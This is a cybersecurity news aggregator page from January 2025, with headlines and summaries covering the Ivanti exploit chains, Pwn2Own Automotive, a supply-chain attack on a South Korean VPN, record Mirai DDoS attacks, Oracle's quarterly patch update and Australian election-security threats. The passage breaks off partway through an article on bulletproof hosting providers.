Security News
The latest cybersecurity news, collected from a wide range of security websites.
2025-01-23 00:46:20
FBI/CISA Share Details on Ivanti Exploits Chains: What Network Defenders Need to Know
The US government shared exploit chains, IOCs and post-incident forensics data to help network defenders hunt for signs of Chinese hacking gangs.
by SecurityWeek
2025-01-22 22:17:08
Trump Overturns Biden Rules on AI Development, Security
The new administration moved quickly to remove any constraints on AI development and collected $500 billion in investment pledges for an American-owned AI joint venture.
by Dark Reading
2025-01-22 22:01:27
Pwn2Own Automotive 2025 Day 1: organizers awarded $382,750 for 16 zero-days
Trend Micro’s Zero Day Initiative (ZDI) announced that $380K was awarded on Day 1 of Pwn2Own Automotive 2025. Trend Micro’s Zero Day Initiative (ZDI) announced that over $380,000 was awarded on Day 1 of Pwn2Own Automotive 2025, a hacking contest that was held in Tokyo. In total, the organizers awarded $382,750 for 16 unique working […]
by Security Affairs
2025-01-22 21:53:22
Announcing the 2025 State of Application Risk Report
Use the data and analysis in this report to prioritize your 2025 AppSec efforts.
by Legit Security
2025-01-22 21:47:00
Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity Review
The new Trump administration has terminated all memberships of advisory committees that report to the Department of Homeland Security (DHS). "In alignment with the Department of Homeland Security's (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory
by The Hacker News
2025-01-22 21:06:52
BreachForums admin to be resentenced after appeals court slams supervised release
A three-judge panel vacated a controversial district court decision that set free Conor Fitzpatrick, the administrator of the massive illicit marketplace, after just 17 days in prison.
by The Record
2025-01-22 20:49:41
Chinese Cyberspies Target South Korean VPN in Supply Chain Attack
Advanced persistent threat group PlushDaemon, active since 2019, is using a sophisticated modular backdoor to collect data from infected systems in South Korea.
by Dark Reading
2025-01-22 20:48:33
Two ransomware groups abuse Microsoft’s Office 365 platform to gain access to target organizations
Two ransomware groups are exploiting Microsoft 365 services and default settings to target internal enterprise users. Sophos researchers started investigating two distinct clusters of activity, tracked as STAC5143 and STAC5777, in response to customer ransomware attacks in November and December 2024. Threat actors used their own Microsoft 365 tenants and exploited a default Teams setting allowing […]
by Security Affairs
2025-01-22 20:35:23
Zendesk’s Subdomain Registration Exposed to Phishing, Pig Butchering Scams
CloudSEK uncovers a Zendesk vulnerability allowing cybercriminals to exploit subdomains for phishing and investment scams. Learn about the…
by Hackread
2025-01-22 20:24:12
Trump Pardons 'Silk Road' Dark Web Drug Market Creator
The pardon comes after 11 years in prison for Ross Ulbricht, who was sentenced to life without parole on several charges, including computer hacking, distribution of narcotics, and money laundering.
by Dark Reading
2025-01-22 19:23:00
Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS Botnet
Threat actors are exploiting an unspecified zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet called AIRASHI to carry out distributed denial-of-service (DDoS) attacks. According to QiAnXin XLab, the attacks have leveraged the security flaw since June 2024. Additional details about the shortcomings have been withheld to prevent further abuse. Some
by The Hacker News
2025-01-22 19:12:53
China-linked hacker group targets victims in East Asia with malicious VPN installers
The group compromised a virtual private network installer developed by the South Korean firm IPany to deploy custom malware on victims' devices.
by The Record
2025-01-22 19:00:20
The best travel VPNs of 2025: Expert tested and reviewed
A VPN is an excellent tool to protect your privacy while away from home. We tested the best VPNs for travel, and our favorites provide strong security, speed, and streaming capabilities.
by ZDNET Security
2025-01-22 18:54:55
Account Credentials for Security Vendors Found on Dark Web
Account credentials from some of the biggest cybersecurity vendors can be purchased on dark web marketplaces, according to a Cyble report published today. While most of the security credentials Cyble found were for customers of those vendors – likely captured by infostealers that infected customer devices – there were also an alarming number of leaked account credentials from the security vendors themselves for sensitive internal accounts for enterprise, development and security systems. The accounts ideally should have been protected by multifactor authentication (MFA), which would have made exploiting the credentials more difficult, but Cyble noted that the leaked credentials show the importance of dark web monitoring as a defense against much bigger cyberattacks like data breaches and ransomware attacks.

Security Company Credentials Can Be Bought for $10
The credentials could be bought for as little as $10 in cybercrime marketplaces, Cyble said, noting that they were likely harvested from infostealer logs and then sold in bulk on dark web marketplaces. Cyble looked only at credentials leaked since the start of the year, as older passwords are more likely to have changed. Of the 14 cybersecurity vendors Cyble examined, each had both customer and internal credentials leaked on the dark web thus far in 2025. The vendors mainly offer enterprise and cloud security tools and services, but some consumer security vendors were included too. Cyble did not publish the names at the request of vendors. Most of the credentials found by Cyble appeared to be customer credentials that protect access to security management and account interfaces, but all the security vendors Cyble examined had access to internal systems leaked on the dark web too.

Security vendor credentials found by Cyble included some for sensitive internal systems such as Okta, Jira, GitHub, AWS, Microsoft Online, Salesforce, SolarWinds, Box, WordPress, Oracle and Zoom, plus other password managers, authentication systems and device management platforms. Cyble said it didn’t test to see if the credentials were valid, but noted that many were for “easily accessible web console interfaces, SSO logins and other web-facing account access points.” One of the largest vendors Cyble looked at appeared to have sensitive internal company accounts exposed, with company email addresses “listed among the credentials for a number of sensitive accounts, including developer and product account interfaces and customer data.” “Depending on the privileges granted to those accounts, the exposure could be substantial,” Cyble noted.

Dark Web Credential Leaks a Boon for Hackers
Besides the obvious hacking potential, Cyble noted that exposed accounts could also help threat actors conduct reconnaissance “by giving them an idea of the systems that a potential target uses, including locations of sensitive data and potential vulnerabilities to exploit. Other sensitive information exposed by infostealers could include URLs of management interfaces that are unknown to the public, giving further recon information to hackers.” Cyble concluded that “If the largest security vendors can be hit by infostealers, so can any organization, making basic cybersecurity practices like MFA, zero trust, vulnerability management and network segmentation important for minimizing – and ideally preventing – data breaches, ransomware and other cyberattacks.”

Updated at 1:28 a.m. UTC January 23, 2025: Vendor names were removed to preserve confidentiality.
by The Cyber Express
2025-01-22 18:49:53
Trump admin tells all Democrats on intelligence oversight board to resign
The Trump administration has requested all Democratic members of an independent board meant to keep tabs on U.S. government intelligence efforts to resign, three people familiar with the matter told Recorded Future News.
by The Record
2025-01-22 18:44:13
Trump pardons Silk Road founder Ross Ulbricht
The new president kept a promise to libertarian supporters that he would pardon Ross Ulbricht, the founder of the Silk Road dark web marketplace, who was convicted a decade ago of charges related to drug distribution, illegal hacking, identity theft and money laundering.
by The Record
2025-01-22 18:19:54
Stratoshark: Wireshark for the cloud – now available!
Stratoshark is an innovative open-source tool that brings Wireshark’s detailed network visibility to the cloud, providing users with a standardized approach to cloud observability. Stratoshark incorporates much of Wireshark’s codebase, including its user interface elements. The interface and workflows will feel instantly recognizable for those already acquainted with Wireshark. By integrating Wireshark’s functionality with Falco’s capabilities (a cloud-native security tool that provides runtime security across hosts, containers, Kubernetes, and cloud environments), Stratoshark delivers contextual visibility …
by Help Net Security
2025-01-22 18:07:54
Cloudflare Mitigates Massive 5.6 Tbps Mirai-Variant DDoS Attack
Cloudflare mitigates a record-breaking 5.6 Tbps DDoS attack, highlighting the growing threat of hyper-volumetric assaults. Learn about the…
by Hackread
2025-01-22 17:59:46
Critical zero-days impact premium WordPress real estate plugins
The RealHome theme and the Easy Real Estate plugins for WordPress are vulnerable to two critical severity flaws that allow unauthenticated users to gain administrative privileges. [...]
by BleepingComputer
2025-01-22 17:53:15
3 extensions to use for anonymous browsing - and what that even means
If you value your privacy, it's time to start using your web browser wisely. If you don't want to switch browsers, try one of these browser extensions to simplify browsing anonymously.
by ZDNET Security
2025-01-22 17:41:17
Iran and Russia deepen cyber ties with new agreement
The pact between the world’s two most sanctioned nations aims to elevate relations "to a new level," the Kremlin said.
by The Record
2025-01-22 17:24:34
DHS Disbands Cyber Safety Review Board, Ending One of CISA’s Few Bright Spots
The Trump administration has disbanded the Cyber Safety Review Board (CSRB), ending one of the few bright spots at CISA.
by SecurityWeek
2025-01-22 17:01:00
Application Security Firm DryRun Raises $8.7 Million in Seed Funding
DryRun Security has raised $8.7 million in a seed funding round for its AI-powered application security solutions.
by SecurityWeek
2025-01-22 17:00:00
The Future Of The CISO - Part 2 - Jess Burn, Jeff Pollard - BSW #379
by SC Media
2025-01-22 16:45:03
Pwn2Own Automotive Kicks Off With $382,000 Bounty Paid on Day One
The first day of Pwn2Own Automotive 2025 saw security researchers successfully exploit multiple in-vehicle infotainment (IVI) systems and electric vehicle (EV) chargers, uncovering 16 previously unknown (zero-day) vulnerabilities. A total of $382,750 was awarded to participants, with researchers demonstrating exploits ranging from buffer overflows to OS command injection flaws. Pwn2Own Automotive, hosted by Trend Micro’s …
by Cyber Insider
2025-01-22 16:38:08
Trump administration fires members of cybersecurity review board in ‘horribly shortsighted’ decision
The Department of Homeland Security told members of the Cyber Safety Review Board that their membership was terminated.
by TechCrunch
2025-01-22 16:36:58
IPany VPN Breached by Hackers Planting Backdoor on Installer
A China-aligned APT group dubbed PlushDaemon has executed a supply-chain attack on IPany, a South Korean VPN provider, by embedding a sophisticated backdoor named SlowStepper into its installer. According to ESET researchers, the attack, which began in late 2023, targeted users across South Korea, Japan, and China, with particular focus on industries like semiconductors and …
by Cyber Insider
2025-01-22 16:32:26
Cloudflare CDN flaw leaks user location data, even through secure chat apps
A security researcher discovered a flaw in Cloudflare's content delivery network (CDN), which could expose a person's general location by simply sending them an image on platforms like Signal and Discord. [...]
by BleepingComputer
2025-01-22 16:01:00
Discover Hidden Browsing Threats: Free Risk Assessment for GenAI, Identity, Web, and SaaS Risks
As GenAI tools and SaaS platforms become a staple component in the employee toolkit, the risks associated with data exposure, identity vulnerabilities, and unmonitored browsing behavior have skyrocketed. Forward-thinking security teams are looking for security controls and strategies to address these risks, but they do not always know which risks to prioritize. In some cases, they might have
by The Hacker News
2025-01-22 16:00:00
President Trump Pardons Silk Road Creator Ross Ulbricht After 11 Years in Prison
U.S. President Donald Trump on Tuesday granted a "full and unconditional pardon" to Ross Ulbricht, the creator of the infamous Silk Road drug marketplace, after spending 11 years behind bars. "I just called the mother of Ross William Ulbricht to let her know that in honor of her and the Libertarian Movement, which supported me so strongly, it was my pleasure to have just signed a full and
by The Hacker News
2025-01-22 15:35:44
Telegram captcha tricks you into running malicious PowerShell scripts
Threat actors on X are exploiting the news around Ross Ulbricht to direct unsuspecting users to a Telegram channel that tricks them into executing PowerShell code that infects them with malware. [...]
by BleepingComputer
2025-01-22 15:33:55
Conduent confirms outage was due to a cybersecurity incident
U.S. government contractor Conduent, which provides technology to support services such as child support and food assistance, has confirmed that a recent outage was caused by a cybersecurity incident. Conduent confirmed the disruption, which left some U.S. residents without access to support payments, to TechCrunch on Tuesday but declined to say whether the outage was […]
by TechCrunch
2025-01-22 15:27:44
Doti AI Raises $7 Million Seed Funding for Instant Access to Internal Company Data
Doti's platform uses AI to improve, automate, and streamline standard office and business processes across distributed and hybrid environments.
by SecurityWeek
2025-01-22 15:24:41
MasterCard DNS Error Went Unnoticed for Years
The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.
by Krebs on Security
2025-01-22 15:17:24
High-severity flaw in file archiver 7-Zip requires manual update
The vulnerability could enable attackers to use nested archives to bypass Windows security warnings.
by SC Media
2025-01-22 15:03:26
Script Searched: How 2024’s Biggest Client-Side Attacks Left Millions of Websites Exposed
Client-side security breaches in 2024 highlight the urgent need for robust monitoring and defense against third-party script vulnerabilities.
by ITPro Today
2025-01-22 15:00:54
CVE-2025-0411 – vulnerability in 7-Zip | Kaspersky official blog
A vulnerability CVE-2025-0411 in the 7-Zip file archiver allows bypassing the Mark-of-the-Web (MOTW) mechanism.
by Kaspersky
2025-01-22 15:00:00
Will 2025 See a Rise of NHI Attacks?
The flurry of non-human identity attacks at the end of 2024 demonstrates extremely strong momentum heading into the new year. That does not bode well.
by Dark Reading
2025-01-22 14:54:59
Mirai botnet behind the largest DDoS attack to date
Researchers have uncovered two Mirai-based botnets harnessing Internet of Things (IoT) devices to DDoS target organizations around the world. The Murdoc botnet Qualys researchers have laid bare the “Murdoc” botnet, consisting of some 1,300 IoT devices saddled with a variant of the Mirai malware that exploits vulnerabilities to compromise AVTECH Cameras and Huawei HG532 routers. “In this latest campaign we note the utilization of ELF file and Shell Script execution, which leads to the deployment …
by Help Net Security
2025-01-22 14:54:24
4 Ways to Mature Your Human Risk Management Program
Human risk management (HRM) is now the primary approach to addressing the ongoing need for strong security cultures in organizations of all sizes. HRM focuses on more than just security awareness training (SAT) delivered at regular intervals. The goal is a positive security culture through:
by KnowBe4
2025-01-22 14:54:06
Is classic Outlook crashing when you start or reply to an email? A fix is on the way
A fix is due out in late January. For now, Microsoft has a workaround.
by ZDNET Security
2025-01-22 14:53:44
Russian Spear-Phishing Campaign Targets WhatsApp Accounts
The Russian threat actor “Star Blizzard” has launched a spear-phishing campaign attempting to compromise WhatsApp accounts, according to researchers at Microsoft. The operation targets individuals who are involved in providing assistance to Ukraine.
by KnowBe4
2025-01-22 14:53:14
Malvertising Campaign Abuses Google Ads to Target Advertisers
Researchers at Malwarebytes are tracking a major malvertising campaign that’s abusing Google Ads to target individuals and businesses interested in advertising.
by KnowBe4
2025-01-22 14:50:00
How Falco and Wireshark paved the way for Stratoshark
The origins of Sysdig, Falco, and Wireshark can be traced back to one fundamental need: making sense of complex, real-time...
by Sysdig
2025-01-22 14:50:00
Stratoshark: Extending Wireshark’s legacy into the cloud
There is nothing more exciting (or nerve-wracking) than sharing something you’ve created with the world. Over 25 years ago, we...
by Sysdig
2025-01-22 14:49:18
Persona helps businesses detect and prevent AI-driven fraud
Persona announced significant advancements in its AI-based face spoof detection capabilities. These updates strengthen Persona’s ability to detect and prevent increasingly sophisticated generative AI fraud techniques. AI-based face spoofs – such as deepfakes, synthetic faces, and face morphs – have enabled fraudsters to scale attacks at an unprecedented pace. For businesses that rely on identity verification, this poses growing risks, from significant financial losses to reputational damage. Gartner predicts that by 2026, attacks using AI-generated deepfakes on face …
by Help Net Security
2025-01-22 14:45:11
Stealing HttpOnly cookies with the cookie sandwich technique
In this post, I will introduce the "cookie sandwich" technique which lets you bypass the HttpOnly flag on certain servers. This research follows on from Bypassing WAFs with the phantom $Version cookie
by PortSwigger Research
2025-01-22 14:42:43
Report Finds 50% of Scattered Spider Phishing Domains Targeted Finance & Insurance
Phishing dominated cyber attacks in H2 2024, accounting for over 90% of incidents across industries due to its simplicity and effectiveness.
by ReliaQuest
2025-01-22 14:34:24
Rimini Protect AHS safeguards against security breaches
Rimini Street announced Rimini Protect Advanced Hypervisor Security (AHS), an exclusive solution powered by proven Vali Cyber AI/ML security technology. The Rimini Protect AHS solution leverages these innovative capabilities that are already protecting mission-critical hypervisor infrastructure, including US military VMware deployments. The Rimini Protect AHS solution combines Vali Cyber technology with Rimini Street’s professional hardening, installation, and managed services. This solution creates a secure, locked-down hypervisor environment, 24/7/365, allowing businesses to manage hypervisor risk. Hypervisor …
by Help Net Security
2025-01-22 14:22:53
Fake Homebrew site leverages Google ads to target macOS, Linux devices
Attackers drop infostealer malware that grabs credentials, web browser data, and crypto wallets.
by SC Media
2025-01-22 14:20:42
What PowerSchool isn’t saying about its ‘massive’ student data breach
The hack has the potential to be one of the biggest of the year, but the edtech giant is refusing to answer important questions.
by TechCrunch
2025-01-22 14:19:00
PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack
A previously undocumented China-aligned advanced persistent threat (APT) group named PlushDaemon has been linked to a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023, according to new findings from ESET. "The attackers replaced the legitimate installer with one that also deployed the group's signature implant that we have named SlowStepper – a
by The Hacker News
2025-01-22 14:09:40
Call for Presentations Open for SecurityWeek’s 2025 Supply Chain Security & Third-Party Risk Summit
Join Us in Shaping the Future of Supply Chain Security - Don’t miss this chance to be part of the conversation addressing one of the most pressing cybersecurity challenges.
by SecurityWeek
2025-01-22 14:00:00
2024 Cloud Threat Landscape Report: How does cloud security fail?
Organizations often set up security rules to help reduce cybersecurity vulnerabilities and risks. The 2024 Cost of a Data Breach Report discovered that 40% of all data breaches involved data distributed across multiple environments, meaning that these best-laid plans often fail in the cloud environment. Not surprisingly, many organizations find keeping a robust security posture […]
by Security Intelligence
2025-01-22 14:00:00
Cyber Insights 2025: APIs – The Threat Continues
APIs are easy to develop, simple to implement, and frequently attacked. They are prime and lucrative targets for cybercriminals.
by SecurityWeek
2025-01-22 14:00:00
Trustwave SpiderLabs 2025 Trustwave Risk Radar Report: Energy and Utilities Sector
The energy sector plays a crucial role in national security by ensuring the delivery of essential infrastructure services and supporting transportation systems. Acknowledging the need to safeguard this vital industry, Trustwave SpiderLabs has published the highly detailed 2025 Trustwave Risk Radar Report: Energy and Utilities Sector.
by SpiderLabs Blog
2025-01-22 13:47:56
Cisco warns of denial of service flaw with PoC exploit code
Cisco has released security updates to patch a ClamAV denial-of-service (DoS) vulnerability, which has proof-of-concept (PoC) exploit code. [...]
by BleepingComputer
2025-01-22 13:34:23
Over $380,000 Paid Out on First Day of Pwn2Own Automotive 2025
$380,000 paid out on the first day of Pwn2Own Automotive 2025 for exploits targeting car infotainment units, operating systems, and chargers.
by SecurityWeek
2025-01-22 13:33:13
7-Zip bug could allow a bypass of a Windows security feature. Update now
A vulnerability in 7-Zip that could allow attackers to bypass the MotW security feature in Windows has been patched.
by Malwarebytes Labs
2025-01-22 13:07:03
Trump Pardons Silk Road Founder Ross Ulbricht, Calls Prosecutors ‘Scum’
President Trump pardons Silk Road founder Ross Ulbricht, slamming prosecutors as “scum.” The move reignites debates on cybercrime…
by Hackread
2025-01-22 13:00:10
Lookout Mobile Intelligence APIs identify cross-platform attacks
Lookout announced their new Lookout Mobile Intelligence Application Programming Interfaces (APIs), exponentially expanding the scope of visibility into enterprise mobile security data. Lookout Mobile Intelligence APIs integrate critical security data from mobile devices into the solutions already in use by security teams – those like SIEM, SOAR, and XDR. This enables security teams to identify cross-platform attacks, risky trends or abnormalities, and potential risks. Mobile devices have become the cornerstone of modern organizations, allowing employees …
by Help Net Security
2025-01-22 12:55:00
Oracle Releases January 2025 Patch to Address 318 Flaws Across Major Products
Oracle is urging customers to apply its January 2025 Critical Patch Update (CPU) to address 318 new security vulnerabilities spanning its products and services. The most severe of the flaws is a bug in the Oracle Agile Product Lifecycle Management (PLM) Framework (CVE-2025-21556, CVSS score: 9.9) that could allow an attacker to seize control of susceptible instances. "Easily exploitable
by The Hacker News
2025-01-22 12:52:40
Oracle January 2025 Critical Patch Update Addresses 186 CVEs
Oracle addresses 186 CVEs in its first quarterly update of 2025 with 318 patches, including 30 critical updates.

Background
On January 21, Oracle released its Critical Patch Update (CPU) for January 2025, the first quarterly update of the year. This CPU contains fixes for 186 CVEs in 318 security updates across 27 Oracle product families. Out of the 318 security updates published this quarter, 9.4% of patches were assigned a critical severity. Medium severity patches accounted for the bulk of security patches at 56.6%, followed by high severity patches at 32.4%. This quarter’s update includes 30 critical patches across 18 CVEs.

Severity    Issues Patched    CVEs
Critical    30                18
High        103               55
Medium      180               109
Low         5                 4
Total       318               186

Analysis
This quarter, the Oracle REST Data Services product family contained the highest number of patches at 85, accounting for 26.7% of the total patches, followed by Oracle Health Sciences Applications at 39 patches, which accounted for 12.3% of the total patches. A full breakdown of the patches for this quarter can be seen in the following table, which also includes a count of vulnerabilities that can be exploited over a network without authentication.

Oracle Product Family                      Number of Patches    Remote Exploit without Auth
Oracle REST Data Services                  85                   59
Oracle Health Sciences Applications        39                   4
Oracle Communications Applications         31                   24
Oracle Graph Server and Client             28                   15
Oracle Construction and Engineering        26                   21
Oracle Analytics                           23                   14
Oracle Communications                      22                   18
Oracle Hospitality Applications            16                   6
Oracle Java SE                             6                    3
Oracle MySQL                               6                    4
Oracle Database Server                     5                    2
Oracle Secure Backup                       4                    1
Oracle TimesTen In-Memory Database         4                    1
Oracle Commerce                            3                    3
Oracle Big Data Spatial and Graph          2                    0
Oracle E-Business Suite                    2                    1
Oracle Financial Services Applications     2                    0
Oracle Fusion Middleware                   2                    1
Oracle Hyperion                            2                    2
Oracle Insurance Applications              2                    1
Oracle PeopleSoft                          2                    0
Oracle Application Express                 1                    0
Oracle Blockchain Platform                 1                    1
Oracle Essbase                             1                    1
Oracle GoldenGate                          1                    1
Oracle Enterprise Manager                  1                    1
Oracle JD Edwards                          1                    0

Solution
Customers are advised to apply all relevant patches in this quarter’s CPU. Please refer to the January 2025 advisory for full details.

Identifying affected systems
A list of Tenable plugins to identify these vulnerabilities will appear here as they’re released. This link uses a search filter to ensure that all matching plugin coverage will appear as it is released.

Get more information
Oracle Critical Patch Update Advisory - January 2025
Oracle January 2025 Critical Patch Update Risk Matrices
Oracle Advisory to CVE Map
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2025-01-22 12:49:45
Murdoc Botnet Ensnaring Avtech, Huawei Devices
The Mirai-based Murdoc botnet has been actively targeting Avtech and Huawei devices for roughly half a year.
by SecurityWeek
2025-01-22 12:42:42
Oracle Patches 200 Vulnerabilities With January 2025 CPU
Oracle has released 318 new security patches to address roughly 200 unique CVEs as part of its January 2025 Critical Patch Update.
by SecurityWeek
2025-01-22 12:39:06
PowerSchool hacker claims they stole data of 62 million students
The hacker who breached education tech giant PowerSchool claimed in an extortion demand that they stole the personal data of 62.4 million students and 9.5 million teachers. [...]
by BleepingComputer
2025-01-22 12:27:22
48,000+ internet-facing Fortinet firewalls still open to attack
Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet FortiGate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. CVE-2024-55591 exploitation On January 10, Arctic Wolf Labs researchers outlined an attack campaign targeting FortiGate firewalls with management interfaces exposed on the public internet by exploiting a zero-day vulnerability. It involved attackers scanning …
by Help Net Security
2025-01-22 12:25:30
DataDome DDoS Protect detects application layer-based threats
DataDome unveiled DDoS Protect, a cloud-based service designed to block distributed denial-of-service (DDoS) attack traffic at the edge before it overwhelms an organization’s infrastructure. DDoS Protect provides always-on, full-stack protection that detects and mitigates application layer-based threats, including evasive and short-lived Layer 7 DDoS attacks, within milliseconds. The solution safeguards businesses against service downtime, wasted resources, and reputational damage resulting from DDoS attacks. Layer 7 DDoS attacks are among the most challenging cybersecurity threats to …
by Help Net Security
2025-01-22 12:08:31
ITOps and DevOps Trends and Predictions 2025 From Industry Insiders
IT leaders and industry insiders share their IT operations & management and DevOps predictions for 2025.
by ITPro Today
2025-01-22 12:01:01
Record-Breaking DDoS Attack Reached 5.6 Tbps
Cloudflare saw a 53% increase in DDoS attack frequency last year, when it blocked a record-breaking 5.6 Tbps attack.
by SecurityWeek
2025-01-22 12:00:00
How Should IT Help Desks Deal With Difficult Users?
Dealing with ill-mannered users can be one of the toughest parts of a help desk role. Learn practical strategies for staying professional during challenging interactions.
by ITPro Today
2025-01-22 11:56:49
Conduent confirms cybersecurity incident behind recent outage
American business services giant and government contractor Conduent confirmed today that a recent outage resulted from what it described as a "cyber security incident." [...]
by BleepingComputer
2025-01-22 11:49:00
Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices
Web infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated
by The Hacker News
2025-01-22 11:04:52
Australia’s 2025 Federal Election: EIAT Highlights Key Threats to Electoral Integrity
As Australia prepares for its 2025 federal election, concerns surrounding the integrity of the electoral process have become a focal point. The Electoral Integrity Assurance Taskforce (EIAT) has played a critical role in highlighting various risks to the country's democratic systems, offering strategic guidance and support to the Australian Electoral Commissioner to ensure a secure and fair election.
The Electoral Integrity Assurance Taskforce (EIAT), established to protect the electoral process, has released a detailed report outlining a range of threats that could potentially compromise the 2025 Australian federal election. The EIAT's role is pivotal in providing consolidated, expert advice to the Australian Electoral Commissioner, ensuring the integrity of the election through careful monitoring of various vulnerabilities, including foreign interference, cybersecurity, misinformation, and physical security concerns.
The Four Key Threats Identified by the EIAT
According to the EIAT's latest report, four main areas of concern have been identified as cyber threats to the upcoming election:
Foreign Interference
Australia, like many democracies around the world, is not immune to attempts by foreign powers to undermine the electoral process. Foreign interference can take many forms, ranging from spreading disinformation to directly influencing candidates. The EIAT report highlights that while these actions are often difficult to trace, foreign interference remains a growing and prolific threat. The Australian government has already taken proactive measures to protect the integrity of its elections, including the establishment of the Counter-Foreign Interference Taskforce. This taskforce works in tandem with agencies like the Australian Federal Police (AFP) and the Australian Security Intelligence Organisation (ASIO) to mitigate these risks.
Physical Security
The report also identifies concerns over physical security, especially in light of increased domestic tensions. The rise in anti-government rhetoric and protest activity has sparked fears that protests, if not managed appropriately, could disrupt the electoral process. The Australian Federal Police (AFP) has reported a sharp increase in criminal activity targeting federal parliamentarians, including threats, intimidation, and attacks on parliamentarian offices. Ensuring the safety of both candidates and voters is vital to maintaining a secure election process, and the government is committed to mitigating these risks through close collaboration between various law enforcement agencies.
Cybersecurity
Cybersecurity has emerged as one of the most pressing concerns ahead of the 2025 election. With the increasing digitalization of election systems, malicious cyber actors, ranging from state-sponsored hackers to cybercriminals and hacktivists, pose a substantial threat to the electoral infrastructure. The EIAT has expressed concern that these actors could disrupt the election, tamper with sensitive data, or undermine public confidence. To counter these risks, the Australian Signals Directorate (ASD) has been working closely with government agencies to enhance the country's cyber defense systems. The Australian Electoral Commissioner is also coordinating with ASD to safeguard the integrity of the election by reviewing potential cyber threats and reinforcing the security of voting systems and data.
Misinformation and Disinformation
The spread of misinformation and disinformation has become increasingly prevalent, particularly on social media platforms. These false narratives can mislead voters and erode public trust in the electoral process. The Electoral Integrity Assurance Taskforce has warned that disinformation could be used as a tool of foreign interference, but it is often spread domestically by individuals or groups with political motives. The Australian Electoral Commissioner is launching initiatives like the "Stop and Consider" campaign to help voters critically evaluate the information they encounter online, promoting digital media literacy to combat misleading or false claims.
Public Awareness and Support from the EIAT
The Electoral Integrity Assurance Taskforce has published several important documents to inform the public, candidates, and political parties about the security landscape of the upcoming election. These documents include the Election Security Environment Overview, which outlines the four key threat vectors mentioned above, and A Candidate’s Guide to the Changing Electoral Environment, which offers valuable resources for political candidates and their teams. This guide provides information on staying safe, understanding legal obligations, and reporting any threats they might encounter during the election campaign. Dr. Kath Gleeson, the EIAT Board Chair, emphasized the importance of these resources in ensuring that both voters and candidates remain informed about the challenges facing the electoral process. Dr. Gleeson stated, “This will ensure voters and candidates have access to important information about safeguarding the next federal election.” She also reiterated the taskforce's commitment to maintaining the public's trust in the electoral system, ensuring that the election remains fair, transparent, and secure.
Conclusion
As the 2025 Australian federal election approaches, the Electoral Integrity Assurance Taskforce is playing a vital role in coordinating efforts to protect the election process. By addressing critical threats such as foreign interference, cyberattacks, physical security risks, and misinformation, the taskforce is working proactively to protect the integrity of the election. In collaboration with the Australian Electoral Commissioner, the taskforce aims to ensure that all Australians can vote with confidence.
As the campaign period intensifies, it is crucial for the public, candidates, and political parties to stay vigilant and report any suspicious activity, supporting the collective effort to uphold Australia’s democratic values and secure a fair and transparent election.
by The Cyber Express
2025-01-22 10:55:00
Threat Spotlight: Tycoon 2FA phishing kit updated to evade inspection
Phishing-as-a-Service (PhaaS) provides attackers with advanced toolsets and templates that enable them to quickly deploy phishing campaigns.
by Barracuda
2025-01-22 10:49:32
2024 Most Inspiring Women in Cyber Winners: Where Are They Now?
Over the past five years, The Most Inspiring Women in Cyber Awards have celebrated some of the most exceptional women from across the cybersecurity industry. From new starters and students to CEOs and CISOs, the awards aim to celebrate outstanding individuals at every level of the industry. No deed is too small for recognition and […]
by IT Security Guru
2025-01-22 10:44:07
Australian Cyber Security Centre Targets Bulletproof Hosting Providers to Disrupt Cybercrime Networks
Overview
The Australian Cyber Security Centre (ACSC) has issued a detailed warning regarding Bulletproof Hosting Providers (BPH). These illicit infrastructure services play a critical role in supporting cybercrime, allowing malicious actors to conduct their operations while remaining largely undetectable. The Australian government’s growing efforts to combat cybercrime highlight the increasing difficulty for cybercriminals to maintain secure, resilient, and hidden infrastructures.
BPH services are an integral part of the Cybercrime-as-a-Service (CaaS) ecosystem, which provides a range of tools and services enabling cybercriminals to carry out their attacks. From ransomware campaigns to data theft, cybercriminals rely on BPH providers to host illicit websites, deploy malware, and execute phishing scams. These hosting services help criminals stay out of the reach of law enforcement and avoid detection, making it harder to track down those behind cyberattacks.
The term "bulletproof" is somewhat misleading, as it is more of a marketing ploy than a reflection of the actual capabilities of these providers. Despite the branding, BPH providers remain vulnerable to disruption just like other infrastructure providers. What sets them apart is their blatant disregard for legal requests to shut down services, as they refuse to comply with takedown orders or abuse complaints from victims or law enforcement. This allows cybercriminals to continue their activities with little fear of being interrupted or exposed.
How Bulletproof Hosting Providers Operate
BPH providers typically lease virtual or physical infrastructure to cybercriminals, offering them a platform to run their operations. These services often include leasing IP addresses and servers that obscure the true identities of their customers. Many BPH providers achieve this by utilizing complex network switching methods, making it difficult to trace activity back to its source. In some cases, these providers even lease IP addresses from legitimate data centers or Internet Service Providers (ISPs), many of whom may remain unaware that their infrastructure is being used for criminal purposes.
A key strategy employed by BPH providers is frequently changing the internet-facing identifiers associated with their customers. This could include altering IP addresses or domain names, further complicating efforts to track criminal activity. These techniques frustrate cybersecurity efforts and investigative agencies, hindering their ability to identify, apprehend, and disrupt criminal activity.
Another distinctive feature of BPH providers is their location. They often operate from countries with permissive cyber regimes, where local laws either lack the framework to tackle malicious cyber activities or are weakly enforced. This makes it even more challenging for law enforcement, such as the ACSC, to take decisive action.
BPH Providers’ Impact on Australian Cybersecurity
